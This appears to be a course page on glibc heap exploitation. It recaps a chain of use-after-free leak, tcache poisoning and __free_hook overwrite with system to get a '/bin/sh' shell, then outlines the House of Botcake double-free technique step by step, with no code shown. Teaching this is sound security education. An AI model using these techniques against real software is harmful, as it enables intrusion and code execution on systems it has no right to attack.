Don't like this style? Click here to change it! blue.css

LOGIN:

Welcome .... Click here to logout

Daily Reminder: Mom's Spaghetti

Our compass through all of this is the desire for the following comfort food:

CONQUER ADDRESS RANDOMIZATION by a USE-AFTER-FREE vulnerability to leak a glibc address
WRITE-WHAT-WHERE using TCACHE-POISONING for arbitrary writing to glibc
CONTROL INSTRUCTION POINTER by overwriting the FREE_HOOK in glibc with system where "/bin/sh" is written in the free'd chunk

You've done baseline mom's, so now we're moving into new techniques for different constraints:

glibc 2.32 introduces "encryption" to tcache
**No UAF but has Double Free...**
glibc 2.34+ has no FREE_HOOK
Can't control the size of your mallocs
Only chunk overflow
Only get poison null byte

Class ???: Double-Free not UAF

House of Botcake

So our goal is this:

Fill a larger tcache bin
Get two chunks to consolidate and go into unsorted bin
Make room in the tcache bin
FREE the consolidated chunk into that tcache bin
Ask for larger chunk and get OVERLAPPING CHUNKS

This allows in-use memory to edit a free'd chunk in the tcache and now we resume mom's spaghetti.

Our Target: This but glibc 2.31

Annotated Samba

Appendix

Our HEAP PLAYGROUND:

Heap Reference Guides: